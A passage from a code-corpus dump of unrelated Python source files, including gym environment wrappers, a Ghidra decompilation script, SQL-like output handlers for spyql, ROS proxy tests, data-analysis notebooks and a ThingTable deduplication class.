def __getattr__(self, name):
return getattr(self.env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self.env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
return observ, reward, done, info
def reset(self):
self._step = 0
return self.env.reset()
class MinimumDuration(gym.Wrapper):
"""Force resets `done` before the specified duration."""
def __init__(self, env, duration):
super(MinimumDuration, self).__init__(env)
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self.env, name)
def step(self, action):
observ, reward, done, info = self.env.step(action)
self._step += 1
if self._step < self._duration:
done = False
return observ, reward, done, info
def reset(self):
self._step = 0
return self.env.reset()
class ConvertTo32Bit(gym.Wrapper):
"""Converts observation and rewards to int/float32."""
def __getattr__(self, name):
return getattr(self.env, name)
def step(self, action):
observ, reward, done, info = self.env.step(action)
observ = nested.map(self._convert_observ, observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
observ = self.env.reset()
observ = nested.map(self._convert_observ, observ)
return observ
def _convert_observ(self, observ):
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
class RenderObservation(gym.Env):
"""Changes the observation space to rendered frames."""
def __init__(self, env, size=(64, 64), dtype=np.uint8, key='image'):
assert isinstance(env.observation_space, gym.spaces.Dict)
self.env = env
self._size = size
self._dtype = dtype
self._key = key
def __getattr__(self, name):
return getattr(self.env, name)
@property
def observation_space(self):
high = {np.uint8: 255, np.float: 1.0}[self._dtype]
image = gym.spaces.Box(0, high, self._size + (3,), dtype=self._dtype)
spaces = self.env.observation_space.spaces.copy()
assert self._key not in spaces
spaces[self._key] = image
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self.env.action_space
def step(self, action):
obs, reward, done, info = self.env.step(action)
obs[self._key] = self._render_image()
return obs, reward, done, info
def reset(self):
obs = self.env.reset()
obs[self._key] = self._render_image()
return obs
def _render_image(self):
"""Renders the environment and processes the image."""
image = self.env.render('rgb_array')
if image.shape[:2] != self._size:
image = np.array(Image.fromarray(image).resize(self._size))
if self._dtype and image.dtype != self._dtype:
if image.dtype in (np.float32, np.float64) and self._dtype == np.uint8:
image = (image * 255).astype(self._dtype)
elif image.dtype == np.uint8 and self._dtype in (np.float32, np.float64):
image = image.astype(self._dtype) / 255
else:
message = 'Cannot convert observations from {} to {}.'
raise NotImplementedError(message.format(image.dtype, self._dtype))
return image
class DeepMindEnv(gym.Env):
"""Wrapper for deepmind MuJoCo environments to expose gym env methods."""
metadata = {'render.modes': ['rgb_array']}
reward_range = (-np.inf, np.inf)
def __init__(self, env, render_size=(64, 64), camera_id=0):
self._env = env
self._render_size = render_size
self._camera_id = camera_id
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
components = {}
for key, value in self._env.observation_spec().items():
components[key] = gym.spaces.Box(
-np.inf, np.inf, value.shape, dtype=np.float32)
return gym.spaces.Dict(components)
@property
def action_space(self):
action_spec = self._env.action_spec()
return gym.spaces.Box(
action_spec.minimum, action_spec.maximum, dtype=np.float32)
def step(self, action):
time_step = self._env.step(action)
obs = dict(time_step.observation)
reward = time_step.reward or 0
done = time_step.last()
info = {'discount': time_step.discount}
return obs, reward, done, info
def reset(self):
time_step = self._env.reset()
return dict(time_step.observation)
def render(self, *args, **kwargs):
if kwargs.get('mode', 'rgb_array') != 'rgb_array':
raise ValueError("Only render mode 'rgb_array' is supported.")
del args # Unused
del kwargs # Unused
return self._env.physics.render(
*self._render_size, camera_id=self._camera_id)
def get_state(self):
return (
np.array(self.physics.data.qpos),
np.array(self.physics.data.qvel),
np.array(self.physics.data.ctrl),
np.array(self.physics.data.act))
def set_state(self, state):
with self.physics.reset_context():
self.physics.data.qpos[:] = state[0]
self.physics.data.qvel[:] = state[1]
self.physics.data.ctrl[:] = state[2]
self.physics.data.act[:] = state[3]
|
pytorch_pfn_extras/distributed/__init__.py
|
belltailjp/pytorch-pfn-extras
| 243 |
63275
|
<gh_stars>100-1000
from pytorch_pfn_extras.distributed._dataset_util import create_distributed_subset_indices # NOQA
|
lightnet/__init__.py
|
rversaw/lightnet
| 345 |
63279
|
<reponame>rversaw/lightnet<gh_stars>100-1000
# coding: utf8
from __future__ import unicode_literals
from .lightnet import Network, Image, BoxLabels
from .about import __version__
def load(name, path=None):
return Network.load(name, path=path)
|
ghida_plugin/ghidra_plugin/FunctionDecompile.py
|
wumb0/GhIDA
| 675 |
63288
|
<filename>ghida_plugin/ghidra_plugin/FunctionDecompile.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
##############################################################################
# #
# FunctionDecompile - Ghidra plugin #
# #
# Copyright 2019 <NAME>, <NAME> #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
##############################################################################
import json
import sys
try:
args = getScriptArgs()
response_dict = dict()
if len(args) < 2:
print("usage: ./FunctionDecompile.py function_address output_path")
sys.exit(0)
decompInterface = ghidra.app.decompiler.DecompInterface()
decompInterface.openProgram(currentProgram)
    # function_address must be in hex format, with an optional trailing 'L'
address = int(args[0].rstrip("L"), 16)
# output_path of the json file (should terminate with ".json")
output_path = args[1]
found = False
response_dict['address'] = address
functionIterator = currentProgram.getFunctionManager().getFunctions(True)
for function in functionIterator:
if function.getEntryPoint().getOffset() == address:
decompileResults = decompInterface.decompileFunction(
function, 30, monitor)
if decompileResults.decompileCompleted():
decompiledFunction = decompileResults.getDecompiledFunction()
decompiled = decompiledFunction.getC()
response_dict['status'] = "completed"
response_dict['decompiled'] = decompiled
else:
response_dict['status'] = "error"
found = True
break
if not found:
response_dict['status'] = "error"
with open(output_path, "w") as f_out:
json.dump(response_dict, f_out)
print("Json saved to %s" % output_path)
except Exception:
response_dict['status'] = "error"
print(json.dumps(response_dict))
|
spyql/output_handler.py
|
alin23/spyql
| 432 |
63315
|
<reponame>alin23/spyql
from spyql.nulltype import Null
class OutputHandler:
"""Mediates data processing with data writting"""
@staticmethod
def make_handler(prs):
"""
Chooses the right handler depending on the kind of query
and eventual optimization opportunities
"""
if prs["group by"] and not prs["partials"]:
return GroupByDelayedOutSortAtEnd(
prs["order by"], prs["limit"], prs["offset"]
)
if prs["order by"]:
# TODO optimization: use special handler that only keeps the top n elements
# in memory when LIMIT is defined
if prs["distinct"]:
return DistinctDelayedOutSortAtEnd(
prs["order by"], prs["limit"], prs["offset"]
)
return DelayedOutSortAtEnd(prs["order by"], prs["limit"], prs["offset"])
if prs["distinct"]:
return LineInDistinctLineOut(prs["limit"], prs["offset"])
return LineInLineOut(prs["limit"], prs["offset"])
def __init__(self, limit, offset):
self.limit = limit
self.rows_written = 0
self.offset = offset if offset else 0
def set_writer(self, writer):
self.writer = writer
def handle_result(self, result, group_key, sort_keys):
"""
To be implemented by child classes to handle a new output row (aka result).
All inputs should be tuples.
"""
return self.is_done()
def is_done(self):
# premature ending
return self.limit is not None and self.rows_written >= self.limit
def write(self, row):
if self.offset > 0:
self.offset = self.offset - 1
else:
self.writer.writerow(row)
self.rows_written = self.rows_written + 1
def finish(self):
self.writer.flush()
class LineInLineOut(OutputHandler):
"""Simple handler that immediately writes every processed row"""
def handle_result(self, result, *_):
self.write(result)
return self.is_done()
def finish(self):
super().finish()
class LineInDistinctLineOut(OutputHandler):
"""In-memory distinct handler that immediately writes every non-duplicated row"""
def __init__(self, limit, offset):
super().__init__(limit, offset)
self.output_rows = set()
def handle_result(self, result, *_):
        # uses a set to store distinct results instead of storing all rows
if result in self.output_rows:
return False # duplicate
self.output_rows.add(result)
self.write(result)
return self.is_done()
def finish(self):
super().finish()
class DelayedOutSortAtEnd(OutputHandler):
"""
Only writes after collecting and sorting all data.
Temporary implementation that reads every processed row into memory.
"""
def __init__(self, orderby, limit, offset):
super().__init__(limit, offset)
self.orderby = orderby
self.output_rows = []
def handle_result(self, result, sort_keys, *_):
self.output_rows.append({"data": result, "sort_keys": sort_keys})
# TODO use temporary files to write `output_rows` whenever it gets too large
# TODO sort intermediate results before writing to a temporary file
return False # no premature endings here
def finish(self):
# TODO read and merge previously sorted temporary files (look into heapq.merge)
# 1. sorts everything
if self.orderby:
for i in reversed(range(len(self.orderby))):
                # taking advantage of list.sort being stable to sort elements from minor
                # to major criteria (may not be the most efficient way, but straightforward)
self.output_rows.sort(
key=lambda row: (
# handle of NULLs based on NULLS FIRST/LAST specification
(row["sort_keys"][i] is Null) != self.orderby[i]["rev_nulls"],
row["sort_keys"][i],
),
reverse=self.orderby[i]["rev"], # handles ASC/DESC order
)
# 2. writes sorted rows to output
for row in self.output_rows:
# it would be more efficient to slice `output_rows` based on limit/offset
# however, this is more generic with less repeated logic and this is a
# temporary implementation
if self.is_done():
break
self.write(row["data"])
super().finish()
class GroupByDelayedOutSortAtEnd(DelayedOutSortAtEnd):
"""
Extends `DelayedOutSortAtEnd` to only store intermediate group by results instead of
keeping all rows in memory
"""
def __init__(self, orderby, limit, offset):
super().__init__(orderby, limit, offset)
self.output_rows = dict()
def handle_result(self, result, sort_keys, group_key):
        # uses a dict to store intermediate group by results instead of storing all rows
self.output_rows[group_key] = {"data": result, "sort_keys": sort_keys}
return False # no premature endings here
def finish(self):
# converts output_rows dict to list so that it can be sorted and written
self.output_rows = list(self.output_rows.values())
super().finish()
class DistinctDelayedOutSortAtEnd(DelayedOutSortAtEnd):
"""
Alters `DelayedOutSortAtEnd` to only store distinct results instead of
keeping all rows in memory
"""
def __init__(self, orderby, limit, offset):
super().__init__(orderby, limit, offset)
self.output_rows = dict()
def handle_result(self, result, sort_keys, *_):
# uses a dict to store distinct results instead of storing all rows
if result not in self.output_rows:
self.output_rows[result] = sort_keys
return False # no premature endings here
def finish(self):
# converts output_rows dict to list so that it can be sorted and written
self.output_rows = [
{"data": k, "sort_keys": v} for k, v in self.output_rows.items()
]
super().finish()
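# Hedged usage sketch (not part of the original module): a toy writer with the
# `writerow`/`flush` methods that OutputHandler expects, used only to show how
# LIMIT/OFFSET are applied by the simplest handler.
if __name__ == "__main__":
    class _ListWriter:
        def __init__(self):
            self.rows = []

        def writerow(self, row):
            self.rows.append(row)

        def flush(self):
            pass

    handler = LineInLineOut(limit=2, offset=1)
    handler.set_writer(_ListWriter())
    for row in [(1,), (2,), (3,), (4,)]:
        if handler.handle_result(row):
            break  # limit reached
    handler.finish()
    print(handler.writer.rows)  # [(2,), (3,)] -- first row skipped by OFFSET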
|
tests/gamestonk_terminal/stocks/quantitative_analysis/test_factors_view.py
|
elan17/GamestonkTerminal
| 1,835 |
63326
|
<filename>tests/gamestonk_terminal/stocks/quantitative_analysis/test_factors_view.py<gh_stars>1000+
# IMPORTATION STANDARD
# IMPORTATION THIRDPARTY
import pytest
# IMPORTATION INTERNAL
from gamestonk_terminal.stocks.quantitative_analysis import factors_view
@pytest.fixture(scope="module")
def vcr_config():
return {
"filter_headers": [("User-Agent", None)],
"filter_query_parameters": [
("period1", "1598220000"),
("period2", "1635980400"),
],
}
@pytest.mark.vcr
@pytest.mark.record_stdout
def test_capm_view():
factors_view.capm_view(ticker="PM")
|
wikum/statistics/analyze_initiators.py
|
xuericlin/wikum
| 114 |
63375
|
<reponame>xuericlin/wikum
from __future__ import print_function
# coding: utf-8
# In[1]:
from builtins import zip
get_ipython().magic(u'matplotlib inline')
import MySQLdb
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
plt.rcParams["figure.figsize"] = [20,12]
# In[2]:
conn = MySQLdb.connect(host='localhost', user='root', passwd='<PASSWORD>', db='wikumnewdb')
cursor = conn.cursor()
# In[3]:
cursor.execute("select text, username, website_comment.created_at, url from website_opencomment INNER JOIN website_article on website_opencomment.article_id = website_article.id INNER JOIN website_commentauthor on website_opencomment.author_id = website_commentauthor.id INNER JOIN website_comment on website_opencomment.comment_id = website_comment.id")
rows = cursor.fetchall()
# In[9]:
# How many RfCs are opened per month?
open_dates = [data[2] for data in rows]
df = pd.DataFrame(index=open_dates)
df['count'] = [1]*len(open_dates)
resampled_df = df.resample('1M', label='right').sum()
# In[5]:
fig, ax = plt.subplots()
ax.plot(resampled_df.index, resampled_df['count'])
fig.suptitle('RfCs initiated', fontsize=20, fontweight='bold',y=0.05)
years = plt.matplotlib.dates.YearLocator()
months = plt.matplotlib.dates.MonthLocator(interval=3)
yearsFmt = plt.matplotlib.dates.DateFormatter('%Y')
monthsFmt = plt.matplotlib.dates.DateFormatter('%b')
ax.xaxis.set_major_locator(years)
ax.xaxis.set_major_formatter(yearsFmt)
ax.xaxis.set_minor_locator(months)
ax.xaxis.set_minor_formatter(monthsFmt)
ax.set_xlabel("Date")
ax.set_ylabel("Number of RfCs initiated")
ax.xaxis.grid(True)
ax.yaxis.grid(True)
labels = ax.get_xticklabels() #"both" gives ugly formatting
plt.setp(labels, rotation=30, fontsize=15)
for xy in zip(resampled_df.index, resampled_df['count']):
ax.annotate(xy[1], xy=xy, textcoords='data')
plt.show()
# In[6]:
# Maximum RfCs initiated in a month
resampled_df.idxmax()
resampled_df.max()
print(int(resampled_df.max()))
# In[7]:
# Top openers
df = pd.DataFrame( [[ij for ij in i] for i in rows] )
df.rename(columns={0:'text', 1:'user name', 2:'date', 3:'url'}, inplace=True)
opening_counts = pd.DataFrame(df.groupby('user name').size().rename('total openings'))
opening_counts.sort_values(by='total openings', ascending=False, inplace=True)
opening_counts.iloc[0:30]
# In[ ]:
|
experimental/gradient_noise/plot_noise.py
|
Pandinosaurus/KungFu
| 291 |
63386
|
<filename>experimental/gradient_noise/plot_noise.py
import re
import matplotlib
import matplotlib.cm as cm
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import numpy as np
# Regex used to pre-filter log lines (matches every line here; narrow it if needed)
line_regex = re.compile(r".*$")
def get_experiment_results(log_file, match_function):
results = []
with open(log_file, "r") as in_file:
for line in in_file:
if (line_regex.search(line)):
match = match_function(line)
if match is not None:
results.append(match)
return results
def extract_from_worker(s, from_worker):
pattern = re.compile(r"\[.*/0" + str(from_worker) + r"/.*\].*", re.VERBOSE)
match = pattern.match(s)
if match is None:
return None
return s
def print_none_match(pattern, l):
print(pattern.pattern)
raise Exception(l)
def get_loss(s):
pattern = re.compile(r".*\)\t(?P<loss>\d+\.\d+)\t.*", re.VERBOSE)
match = pattern.match(s)
if match is None:
return None
return float(match.group("loss"))
def get_noise(s):
pattern = re.compile(r".*iteration\[(?P<noise>[\-\+]?\d+\.\d+)\]\n",
re.VERBOSE)
match = pattern.match(s)
if match is None:
return None
return float(match.group("noise"))
def plot(lines):
losses = [get_loss(l) for l in lines]
    losses = list(filter(None, losses))
    noises = [get_noise(l) for l in lines]
    noises = list(filter(None, noises))
    pairs = list(zip(losses, noises))  # zip() is lazy in Python 3, so materialize before sorting
    pairs.sort(key=lambda x: x[0])
print(pairs)
losses, noises = zip(*pairs)
plt.ylim([-200000, 200000])
plt.title('ResNet-32 gradient noise scale')
plt.ylabel('Gradient Noise')
plt.xlabel('Training Loss')
plt.plot(losses, noises)
plt.show()
def main():
num_workers = 1
workers = []
for worker in range(num_workers):
worker = get_experiment_results(
'./correctnoise-tensorboard.log',
lambda x: extract_from_worker(x, worker))
workers.append(worker)
for worker_logs in workers:
plot(worker_logs)
if __name__ == "__main__":
main()
|
python/intro.py
|
surabhi226005/functional-programming-learning-path
| 627 |
63389
|
# Assign functions to a variable
def add(a, b):
return a + b
plus = add
value = plus(1, 2)
print(value) # 3
# Lambda
value = (lambda a, b: a + b)(1, 2)
print(value) # 3
addition = lambda a, b: a + b
value = addition(1, 2)
print(value) # 3
authors = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>'
]
sorted_authors_by_name_length = sorted(authors, key=len)
print(sorted_authors_by_name_length)
sorted_authors_by_last_name = sorted(authors, key=lambda name: name.split()[-1])
print(sorted_authors_by_last_name)
|
basic-example/test.py
|
tr4r3x/remora
| 206 |
63409
|
#!/usr/bin/python
import requests
def check():
data = {}
consumers = requests.get('http://localhost:9000/consumers').json()
for consumer_group in consumers:
consumer_infos = requests.get(
'http://localhost:9000/consumers/{consumer_group}'.format(
consumer_group=consumer_group)).json()
for partition in consumer_infos['partition_assignment']:
data[
'{consumer_group}-{topic}-{partition}-lag'.format(
consumer_group=consumer_group,
topic=partition['topic'],
partition=partition['partition'])] = partition['lag']
data[
'{consumer_group}-{topic}-{partition}-log_end_offset'.format(
consumer_group=consumer_group,
topic=partition['topic'],
partition=partition['partition'])] = partition['log_end_offset']
data[
'{consumer_group}-{topic}-{partition}-offset'.format(
consumer_group=consumer_group,
topic=partition['topic'],
partition=partition['partition'])] = partition['offset']
print(data)
return data
if __name__ == "__main__":
check()
|
flexbe_core/test/test_proxies.py
|
duwke/flexbe_behavior_engine
| 119 |
63430
|
<reponame>duwke/flexbe_behavior_engine<gh_stars>100-1000
#!/usr/bin/env python
import unittest
import rospy
import actionlib
from flexbe_core.proxy import ProxyPublisher, ProxySubscriberCached, ProxyActionClient, ProxyServiceCaller
from std_msgs.msg import String
from std_srvs.srv import Trigger, TriggerRequest
from flexbe_msgs.msg import BehaviorExecutionAction, BehaviorExecutionGoal, BehaviorExecutionResult
class TestProxies(unittest.TestCase):
def test_publish_subscribe(self):
t1 = '/pubsub_1'
t2 = '/pubsub_2'
pub = ProxyPublisher({t1: String})
pub = ProxyPublisher({t2: String}, _latch=True)
sub = ProxySubscriberCached({t1: String})
self.assertTrue(pub.is_available(t1))
self.assertTrue(pub.wait_for_any(t1))
self.assertFalse(pub.wait_for_any(t2))
pub.publish(t1, String('1'))
pub.publish(t2, String('2'))
rospy.sleep(.5) # make sure latched message is sent before subscriber is added
sub = ProxySubscriberCached({t2: String})
rospy.sleep(.5) # make sure latched message can be received before checking
self.assertTrue(sub.has_msg(t1))
self.assertEqual(sub.get_last_msg(t1).data, '1')
sub.remove_last_msg(t1)
self.assertFalse(sub.has_msg(t1))
self.assertIsNone(sub.get_last_msg(t1))
self.assertTrue(sub.has_msg(t2))
self.assertEqual(sub.get_last_msg(t2).data, '2')
def test_subscribe_buffer(self):
t1 = '/buffered_1'
pub = ProxyPublisher({t1: String})
sub = ProxySubscriberCached({t1: String})
sub.enable_buffer(t1)
self.assertTrue(pub.wait_for_any(t1))
pub.publish(t1, String('1'))
pub.publish(t1, String('2'))
rospy.sleep(.5) # make sure messages can be received
self.assertTrue(sub.has_msg(t1))
self.assertTrue(sub.has_buffered(t1))
self.assertEqual(sub.get_from_buffer(t1).data, '1')
pub.publish(t1, String('3'))
rospy.sleep(.5) # make sure messages can be received
self.assertEqual(sub.get_from_buffer(t1).data, '2')
self.assertEqual(sub.get_from_buffer(t1).data, '3')
self.assertIsNone(sub.get_from_buffer(t1))
self.assertFalse(sub.has_buffered(t1))
def test_service_caller(self):
t1 = '/service_1'
rospy.Service(t1, Trigger, lambda r: (True, 'ok'))
srv = ProxyServiceCaller({t1: Trigger})
result = srv.call(t1, TriggerRequest())
self.assertIsNotNone(result)
self.assertTrue(result.success)
self.assertEqual(result.message, 'ok')
self.assertFalse(srv.is_available('/not_there'))
srv = ProxyServiceCaller({'/invalid': Trigger}, wait_duration=.1)
self.assertFalse(srv.is_available('/invalid'))
def test_action_client(self):
t1 = '/action_1'
server = None
def execute_cb(goal):
rospy.sleep(.5)
if server.is_preempt_requested():
server.set_preempted()
else:
server.set_succeeded(BehaviorExecutionResult(outcome='ok'))
server = actionlib.SimpleActionServer(t1, BehaviorExecutionAction, execute_cb, auto_start=False)
server.start()
client = ProxyActionClient({t1: BehaviorExecutionAction})
self.assertFalse(client.has_result(t1))
client.send_goal(t1, BehaviorExecutionGoal())
rate = rospy.Rate(20)
for i in range(20):
self.assertTrue(client.is_active(t1) or client.has_result(t1))
rate.sleep()
self.assertTrue(client.has_result(t1))
result = client.get_result(t1)
self.assertEqual(result.outcome, 'ok')
client.send_goal(t1, BehaviorExecutionGoal())
rospy.sleep(.1)
client.cancel(t1)
rospy.sleep(.9)
self.assertFalse(client.is_active(t1))
self.assertFalse(client.is_available('/not_there'))
client = ProxyActionClient({'/invalid': BehaviorExecutionAction}, wait_duration=.1)
self.assertFalse(client.is_available('/invalid'))
if __name__ == '__main__':
rospy.init_node('test_flexbe_proxies')
import rostest
rostest.rosrun('flexbe_core', 'test_flexbe_proxies', TestProxies)
|
tests/test_activations.py
|
themantalope/DLTK
| 1,397 |
63441
|
import tensorflow as tf
from dltk.core.activations import leaky_relu
import numpy as np
def test_leaky_relu():
test_alpha = tf.constant(0.1)
test_inp_1 = tf.constant(1.)
test_inp_2 = tf.constant(-1.)
test_relu_1 = leaky_relu(test_inp_1, test_alpha)
test_relu_2 = leaky_relu(test_inp_2, test_alpha)
with tf.Session() as s:
out_1 = s.run(test_relu_1)
assert np.isclose(out_1, 1.), \
'Got {} but expected {}'.format(out_1, 1.)
out_2 = s.run(test_relu_2)
assert np.isclose(out_2, -0.1), \
'Got {} but expected {}'.format(out_2, -0.1)
|
text_extensions_for_pandas/array/thing_table.py
|
ZachEichen/text-extensions-for-pandas
| 193 |
63468
|
#
# Copyright (c) 2021 IBM Corp.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import textwrap
#
# thing_table.py
#
# Part of text_extensions_for_pandas
#
# Data structure for managing collections of immutable items that implement
# __hash__ and __eq__. Serves as a base class for StringTable
#
from abc import ABC, abstractmethod
from typing import *
import numpy as np
class ThingTable(ABC):
"""
A set of immutable things, plus integer IDs for said things.
Also implicitly maps `None` to ID -1.
Serves as a base class for collections of specific things like strings and
tokenizations.
"""
# Special integer ID for None as a thing.
NONE_ID = -1
# Special integer ID for "not an id"
NOT_AN_ID = -2
def __init__(self):
# Bidirectional map from unique thing (possibly boxed for dictionary
# compatibility) to integer ID and back
self._boxed_thing_to_id = {} # type: Dict[Any, int]
self._id_to_boxed_thing = [] # type: List[Any]
self._total_bytes = 0 # type: int
@abstractmethod
def size_of_thing(self, thing: Any) -> int:
"""
        :param thing: Thing to be inserted into this table
:return: The number of bytes that the thing occupies in memory
"""
pass
@abstractmethod
def type_of_thing(self) -> Type:
"""
:return: Expected type of things that this table will manage
"""
pass
def box(self, thing: Any) -> Any:
"""
Subclasses should override this method if they manage items that aren't
compatible with Python dictionaries.
:param thing: Thing to insert into the table
:return: a dictionary-compatible boxed version of `thing`, if such boxing
is needed to make `thing` dictionary-compatible.
"""
# Default implementation is a no-op
return thing
def unbox(self, boxed_thing: Any) -> Any:
"""
Subclasses should override this method if they manage items that aren't
compatible with Python dictionaries.
:param boxed_thing: Thing that was boxed by this class's `box` method.
:return: Original thing that was passed to `box`
"""
# Default implementation is a no-op
return boxed_thing
@classmethod
def create_single(cls, thing: Any):
"""
Factory method for building a table containing a single value at ID 0.
Users of this class are encouraged to use this method when possible,
so that performance tuning can be localized to this method.
"""
# For now we return a fresh table each time.
ret = cls()
ret.maybe_add_thing(thing)
return ret
@classmethod
def merge_tables_and_ids(cls, tables: Sequence["ThingTable"],
int_ids: Sequence[np.ndarray]) \
-> Tuple["ThingTable", np.ndarray]:
"""
Factory method for combining together multiple references to different
ThingTables into references to a new, combined ThingTable of the same type.
Users of this class are encouraged to use this method when possible,
so that performance tuning can be localized to this method.
:param tables: A list of (possibly) different mappings from int to string
:param int_ids: List of lists of integer IDs that decode to strings via the
corresponding elements of `tables`.
:returns: A tuple containing:
* A new, merged table containing all the unique things under `tables`
that are referenced in `int_ids` (and possibly additional things that aren't
referenced)
* Numpy arrays of integer offsets into the new table, corresponding to the
elements of `int_ids`
"""
if len(tables) != len(int_ids):
raise ValueError(f"Got {len(tables)} {cls}s "
f"and {len(int_ids)} lists of IDs.")
# TODO: Add fast-path code here to pass through the first table if
# both input tables are identical.
new_table = cls()
new_ids_list = []
for i in range(len(tables)):
old_table = tables[i]
if not isinstance(old_table, cls):
raise TypeError(f"Expected table of type {cls}, but got "
f"{type(old_table)}")
old_ids = int_ids[i]
if len(old_ids.shape) != 1:
raise ValueError(f"Invalid shape for IDs {old_ids}")
new_ids = np.empty_like(old_ids, dtype=int)
old_id_to_new_id = [
new_table.maybe_add_thing(old_table.id_to_thing(j))
for j in range(old_table.num_things)
]
for j in range(len(old_ids)):
new_ids[j] = old_id_to_new_id[old_ids[j]]
new_ids_list.append(new_ids)
return new_table, new_ids_list
@classmethod
def merge_things(cls, things: Union[Sequence[Any], np.ndarray]):
f"""
Factory method for bulk-adding multiple things to create a single
ThingTable and a list of integer IDs against that ThingTable.
Users of this class are encouraged to use this method when possible,
so that performance tuning can be localized to this method.
:param things: things to be de-duplicated and converted to a ThingTable.
:returns: Two values:
* A ThingTable containing (at least) all the unique strings in `strings`
* A Numppy array of integer string IDs against the returned ThingTable, where
each ID maps to the corresponding element of `strings`
"""
new_table = cls()
str_ids = np.empty(len(things), dtype=int)
for i in range(len(things)):
str_ids[i] = new_table.maybe_add_thing(things[i])
return new_table, str_ids
@classmethod
def from_things(cls, things: Union[Sequence[Any], np.ndarray]):
"""
Factory method for creating a ThingTable from a sequence of unique things.
:param things: sequence of unique things to be added to the ThingTable.
:return: A ThingTable containing the elements of `things`.
"""
new_table = cls()
for thing in things:
new_table.add_thing(thing)
return new_table
def thing_to_id(self, thing: Any) -> int:
"""
:param thing: A thing to look up in this table
:returns: One of:
* The integer ID of the indicated thing, if present.
* `ThingTable.NONE_ID` if thing is None
* `ThingTable.NOT_AN_ID` if thing is not present in the table
"""
if thing is None:
# By convention, None maps to -1
return ThingTable.NONE_ID
elif not isinstance(thing, self.type_of_thing()):
raise TypeError(f"Expected an object of type {self.type_of_thing()}, "
f"but received an object of type {type(thing)}")
else:
# Remaining branches require boxing for dictionary lookup
boxed_thing = self.box(thing)
if boxed_thing not in self._boxed_thing_to_id:
return ThingTable.NOT_AN_ID
else:
return self._boxed_thing_to_id[boxed_thing]
def id_to_thing(self, int_id: Union[int, np.int64, np.int32]) -> Any:
"""
:param int_id: Integer ID that is potentially associated with a thing in the
table
:return: The associated thing, if present, or `None` if no thing is associated
with the indicated ID.
"""
if not isinstance(int_id, (int, np.int64, np.int32)):
raise TypeError(f"Expected integer, but received {int_id} "
f"of type {type(int_id)}")
elif int_id <= ThingTable.NOT_AN_ID:
raise ValueError(f"Invalid ID {int_id}")
elif ThingTable.NONE_ID == int_id:
return None
else:
boxed_thing = self._id_to_boxed_thing[int_id]
return self.unbox(boxed_thing)
def ids_to_things(self, int_ids: Union[Sequence[int], np.ndarray]) -> np.ndarray:
"""
        Vectorized version of :func:`id_to_thing` for translating multiple IDs
        at once.
        :param int_ids: Multiple integer IDs to be translated to things
        :returns: A numpy array of thing objects.
"""
if not isinstance(int_ids, np.ndarray):
int_ids = np.array(int_ids, dtype=int)
if len(int_ids.shape) != 1:
raise TypeError(f"Invalid shape {int_ids.shape} for array of integer IDs.")
ret = np.empty(len(int_ids), dtype=object)
for i in range(len(int_ids)):
ret[i] = self.id_to_thing(int_ids[i].item())
return ret
def add_thing(self, thing: Any) -> int:
"""
Adds a thing to the table. Raises a ValueError if the thing is already
present.
:param thing: Thing to add
:return: unique ID for this thing
"""
if not isinstance(thing, self.type_of_thing()):
raise TypeError(f"Expected an object of type {self.type_of_thing()}, "
f"but received an object of type {type(thing)}")
# Box for dictionary compatibility
boxed_thing = self.box(thing)
if boxed_thing in self._boxed_thing_to_id:
raise ValueError(f"'{textwrap.shorten(str(thing), 40)}' already in table")
new_id = len(self._id_to_boxed_thing)
self._id_to_boxed_thing.append(boxed_thing)
self._boxed_thing_to_id[boxed_thing] = new_id
self._total_bytes += self.size_of_thing(thing)
return new_id
def maybe_add_thing(self, thing: Any) -> int:
"""
Adds a thing to the table if it is not already present.
:param thing: Thing to add
:return: unique ID for this thing
"""
if not isinstance(thing, self.type_of_thing()):
raise TypeError(f"Expected an object of type {self.type_of_thing()}, "
f"but received an object of type {type(thing)}")
current_id = self.thing_to_id(thing)
if current_id != ThingTable.NOT_AN_ID:
return current_id
else:
return self.add_thing(thing)
def maybe_add_things(self, s: Sequence[Any]) -> np.ndarray:
"""
Vectorized version of :func:`maybe_add_thing` for translating, and
potentially adding multiple things at once.
:param s: Multiple things to be translated and potentially added
:returns: A numpy array of the corresponding integer IDs for the things.
        Adds each thing to the table if it is not already present.
"""
result = np.empty(len(s), dtype=np.int32)
for i in range(len(result)):
result[i] = self.maybe_add_thing(s[i])
return result
def nbytes(self):
"""
Number of bytes in a (currently hypothetical) serialized version of this table.
"""
return self._total_bytes
@property
def num_things(self) -> int:
"""
:return: Number of distinct things in the table
"""
return len(self._id_to_boxed_thing)
@property
def things(self) -> Iterator[Any]:
"""
:return: Iterator over the unique things stored in this table.
"""
return (self.unbox(thing) for thing in self._id_to_boxed_thing)
@property
def ids(self) -> Iterator[int]:
"""
:return: Iterator over the IDs of things stored in this table, including the
implicit ID ThingTable.NONE_ID
"""
if ThingTable.NONE_ID != -1:
raise ValueError("Someone has changed the value of NONE_ID; need to rewrite "
"this function.")
return range(-1, len(self._id_to_boxed_thing))
